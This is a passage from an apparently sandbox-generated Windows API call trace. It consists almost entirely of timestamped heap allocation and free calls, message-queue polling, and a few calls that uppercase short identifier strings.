hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.295] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0196.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0196.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0196.297] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.297] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.297] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.297] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0196.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.298] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.298] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.298] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.299] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.299] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.299] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.300] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.302] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.302] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.302] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.302] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.303] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.303] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.303] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.303] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.303] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.304] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.342] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x25c0000, 